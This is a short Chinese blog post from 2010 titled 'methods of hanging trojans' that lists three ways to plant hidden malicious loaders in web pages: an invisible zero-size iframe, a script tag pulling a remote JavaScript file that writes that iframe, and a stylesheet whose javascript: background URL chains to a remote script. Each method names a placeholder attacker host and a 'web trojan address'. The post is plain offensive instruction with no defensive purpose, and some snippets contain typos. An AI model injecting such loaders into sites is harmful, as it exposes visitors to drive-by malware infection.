2010年2月19日星期五

挂马方法

1。一般挂马:
<Iframe src="网页木马地址" width="0" height="0" scrolling="no" frameborder="0"></iframe> 这句是挂到网页上

2。js隐藏挂马:
<script src="http://xxx.xxx.xxx/mm.js"></script>  这句是挂到网页上
其中mm.js内容为:
document.write('<Iframe src="网页木马地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>');

3。CSS挂马(更加隐藏)
<link href="htto://xxxxx.xxxxx/css.css" rel="stylesheet" type="text/css" />  这句是挂到网页上
其中css.css的内容:
body { background-image: url(javascript:document.writ ("<script src="http://xxx.xxxx.xx/css.js"></script>")')}
其中css.js的内容:
<script src="网页木马地址"></script>

没有评论: